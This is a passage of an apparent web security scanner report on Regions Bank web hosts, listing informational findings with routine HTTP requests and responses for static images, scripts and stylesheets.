| GET /oao/Images/loading7.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2246 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89aQ....?............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/yourinfo | 
| GET /oao/Images/yourinfo Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 4021 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:06 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Scripts/jquery.js | 
| GET /oao/Scripts/jquery.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 29856 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* * jQuery 1.2.3 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * $Date: 20 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Scripts/thickbox.js | 
| GET /oao/Scripts/thickbox.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 17069 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* * Thickbox 3.1 - One Box To Rule Them All. * By Cody Lindley (http://www.codylindley * Copyright (c) 2007 cody lindley * Licensed under the MIT License: http://www.opensource.org ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app01.aspx | 
| GET /oao/app01.aspx?type Host: secureapps.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Date: Mon, 16 May 2011 15:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 48498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app02.aspx | 
| GET /oao/app02.aspx?type Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:42 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 76388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/arrowOrange | 
| GET /oao/images/arrowOrange Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 60 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.. .....f..........!......., | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/bgDot.gif | 
| GET /oao/images/bgDot.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 46 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/continue.gif | 
| GET /oao/images/continue.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 407 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:23 GMT GIF89aG...............].. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/ehl_logo.gif | 
| GET /oao/images/ehl_logo.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 595 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a.........[[[...\\\MMM..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/error.gif | 
| GET /oao/images/error.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 299 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:23 GMT GIF89a..........,........}y....`[ ...d8.N`.Q...%..h0.... ...O...\...........s% ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/homepage.gif | 
| GET /oao/images/homepage.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 632 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:42 GMT GIF89a.........U`........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/icon_secure | 
| GET /oao/images/icon_secure Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 77 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:18 GMT GIF89a .............i....!...... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/images/loadingA | 
| GET /oao/images/loadingA Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 5886 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:17 GMT GIF89a........................... ...,.......... .@Ri.h..l..p,.tm..#6N.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/scripts/wtbase.js | 
| GET /oao/scripts/wtbase.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 17051 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:01 GMT function DcsInit() { this.dcsid = "dcs4b71fc10000gs8u8 this.domain = "statse.webtrendslive.com this.enabled = true; this.exre = (function() { if (window.Reg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/styles/main.css | 
| GET /oao/styles/main.css HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 10689 Content-Type: text/css Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:57 GMT img{border:none; padding:0px; margin:0px;} body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;} A:link {color: #580; text-decoration: none;} A:activ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/styles/thickbox.css | 
| GET /oao/styles/thickbox.css HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 4016 Content-Type: text/css Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* ------------------------- /* ---------->>> global settings needed for thickbox <<<---------------------- ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /SystemUnavailable.aspx | 
| GET /SystemUnavailable.aspx Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: securebank.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 4559 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="https://secureb ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM.js | 
| GET /VAM/2_0_2/VAM.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 37697 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 var gVAM_UA = navigator.userAgent var gVAM_OS, gV ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAML2.js | 
| GET /VAM/2_0_2/VAML2.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5007 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_EvalDiffCond(pCO) { var vVal1 = pCO.ConvVal(pCO, p ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM_DTTB.js | 
| GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5948 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_ReformatInit(pAO) { var vFld = VAM_GetById(pAO.Con ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT Accept-Ranges: bytes ETag: "e0921d6e811c81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:22 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/btnContinue.gif | 
| GET /images/btnContinue.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 1026 Content-Type: image/gif Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT Accept-Ranges: bytes ETag: "03d9adc2454c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89aF......U..U.....V.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/equalhousing.gif | 
| GET /images/equalhousing.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 282 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a...........//...... ...s.%. .#.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/green/rf_logo.gif | 
| GET /images/green/rf_logo.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 4105 Content-Type: image/gif Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT Accept-Ranges: bytes ETag: "0e6a25879fdc81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:05 GMT GIF89a).8.......U........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/red_arrow.gif | 
| GET /images/red_arrow.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 54 Content-Type: image/gif Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT Accept-Ranges: bytes ETag: "0a53d764750c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89a........U....!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/spacer.gif | 
| GET /images/spacer.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 799 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /script/regions.js | 
| GET /script/regions.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT Accept-Ranges: bytes ETag: "01c578a6a70cb1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 8556 /************************ * * * Copyright .2005 Corillian Corporation * * ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/styles.AmSouth | 
| GET /styles/styles.AmSouth Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
